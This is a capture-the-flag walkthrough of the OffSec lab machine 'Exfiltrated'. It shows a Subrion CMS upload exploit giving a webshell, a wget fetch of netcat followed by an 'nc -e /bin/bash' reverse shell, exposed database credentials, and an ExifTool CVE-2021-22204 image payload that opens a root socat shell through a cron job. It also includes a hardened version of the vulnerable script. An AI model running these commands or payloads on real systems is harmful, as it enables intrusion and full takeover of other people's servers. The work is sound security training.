# Exfiltrated

`subrion` `suid` `exiftool`

* Machine name: Exfiltrated
* Difficulty: Easy
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 17:07 EDT
Nmap scan report for 192.168.210.163
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

Browsing to the IP redirects us to a domain name, which we add to the /etc/hosts file.

Via the panel (/panel/) we can log in as admin:admin. We also get the version number: Subrion CMS 4.2.1.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FXsZIgAtytadoeOEmvBf3%2F345b1306fa31496b567295bb9a1e16ba.png?alt=media&#x26;token=15f7cd4a-841d-49c6-8f8e-3bf5df4b9c43" alt=""><figcaption></figcaption></figure>

We find a public exploit for this version.

## Initial access

{% embed url="https://www.exploit-db.com/exploits/49876" %}

```
┌──(kali㉿kali)-[~/oscp/exfil]
└─$ python exploit.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: 73pF2noeCOmx40FfdlADpqOAmswX8NbbfI72C1d6
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: ifdmtybatjjebua

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/ifdmtybatjjebua.phar 

$ ls
ifdmtybatjjebua.phar

$ whoami
www-data
```

Let's upgrade our shell. We started a Python web server on our machine on port 80 and a listener on port 1234.

```
$ wget http://192.168.45.156/Tools/nc
$ chmod 777 nc
$ ./nc 192.168.45.156 1234 -e /bin/bash
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.156] from (UNKNOWN) [192.168.210.163] 45380
cd /home
ls
coaran
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

## Privilege escalation

After searching online, we find that the database credentials are stored in includes/config.inc.php.

```
www-data@exfiltrated:/var/www/html/subrion/includes$ cat config.inc.php
cat config.inc.php
<?php
/*
 * Subrion Open Source CMS 4.2.1
 * Config file generated on 10 June 2021 12:04:54
 */

define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');

define('IA_SALT', '#5A7C224B51');

// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);
```

```
www-data@exfiltrated:/var/www/html/subrion/includes$ mysql -u subrionuser -p
mysql -u subrionuser -p
Enter password: target100

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 138
Server version: 10.3.29-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
```

Nothing interesting in the database; the only user is admin.

```
www-data@exfiltrated:/var/www/html/subrion/includes$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *	* * *	root	bash /opt/image-exif.sh
```

```
cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"


IMAGES='/var/www/html/subrion/uploads'

META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
do 
    exiftool "$IMAGES/$filename" >> $LOGFILE 
done

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
```
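A hardened counterpart to the cron script above, added here as a defensive example (it is not the machine's script): it keeps the same job but drops root with runuser, accepts only plain .jpg/.jpeg basenames, checks the JPEG magic bytes and runs ExifTool under a timeout. It assumes a dedicated unprivileged account exifproc (hypothetical name) that owns /opt/metadata, and an ExifTool patched for CVE-2021-22204, since dropping privileges only limits what a parser bug can do.

```shell
#!/bin/sh
# Hardened replacement for /opt/image-exif.sh (added example, not the target's script).
# Assumptions: an unprivileged account "exifproc" (hypothetical) owns /opt/metadata,
# and ExifTool is patched for CVE-2021-22204. Dropping root only limits the blast
# radius of a parser bug; it does not remove it.
set -eu

IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
RUNAS='exifproc'

# Accept only plain basenames ending in .jpg/.jpeg: no path separators, no leading
# dash or dot, no shell metacharacters, so an upload name cannot become an option or path.
is_safe_jpeg_name() {
    case "$1" in
        */*|-*|.*|*[!A-Za-z0-9._-]*) return 1 ;;
        *.jpg|*.jpeg) return 0 ;;
        *) return 1 ;;
    esac
}

# The file must start with the JPEG SOI marker (FF D8 FF). This rejects junk such as a
# renamed .phar; a crafted file that is still a valid JPEG passes, which is why the
# real protection is the privilege drop plus an up-to-date ExifTool.
has_jpeg_magic() {
    [ "$(head -c 3 "$1" | od -An -tx1 | tr -d ' \n')" = "ffd8ff" ]
}

# Run ExifTool as the unprivileged user with a time budget; one failing file is
# reported and must not abort the whole run.
process_image() {
    timeout 30 runuser -u "$RUNAS" -- exiftool "$1" >>"$2" 2>&1 ||
        echo "exiftool failed on $1" >&2
}

main() {
    [ "$(id -u)" -eq 0 ] || { echo "must start as root to drop to $RUNAS" >&2; exit 1; }
    umask 077                     # log files readable by root only
    logfile="$META/$(openssl rand -hex 5)"
    for path in "$IMAGES"/*.jpg "$IMAGES"/*.jpeg; do
        [ -f "$path" ] || continue            # unmatched glob or non-regular file
        name=${path##*/}
        is_safe_jpeg_name "$name" && has_jpeg_magic "$path" || continue
        process_image "$path" "$logfile"
    done
}

# Cron entry: * * * * * root /opt/image-exif.sh run
if [ "${1:-}" = "run" ]; then main; fi
```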

The cron job runs exiftool as root every minute over the uploads directory that our web shell already writes to. The installed ExifTool is vulnerable to CVE-2021-22204, for which a public exploit exists:

<https://github.com/UNICORDev/exploit-CVE-2021-22204>

```
┌──(kali㉿kali)-[~/oscp/exfil]
└─$ python script.py -c 'socat TCP:192.168.45.156:1235 EXEC:/bin/bash'

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
PAYLOAD: (metadata "\c${system('socat TCP:192.168.45.156:1235 EXEC:/bin/bash')};")
DEPENDS: Dependencies for exploit are met!
PREPARE: Payload written to file!
PREPARE: Payload file compressed!
PREPARE: DjVu file created!
PREPARE: JPEG image created/processed!
PREPARE: Exiftool config written to file!
EXPLOIT: Payload injected into image!
CLEANUP: Old file artifacts deleted!
SUCCESS: Exploit image written to "image.jpg"
```

We upload it to the target's uploads folder, start a listener and wait for the cron job to run.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [192.168.45.156] from (UNKNOWN) [192.168.210.163] 56658
whoami
root
```
